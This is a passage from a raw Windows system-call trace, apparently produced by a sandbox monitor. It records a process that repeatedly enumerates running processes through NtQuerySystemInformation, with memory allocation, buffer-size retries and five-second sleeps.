ResultLength=0x0) returned 0x0 [0228.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.649] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.657] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.670] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.680] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.687] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.696] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.706] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.714] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.723] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.732] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.742] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.750] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.757] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.764] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.773] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.781] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.789] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.797] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.805] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.813] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.820] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.823] NtAllocateVirtualMemory (in: 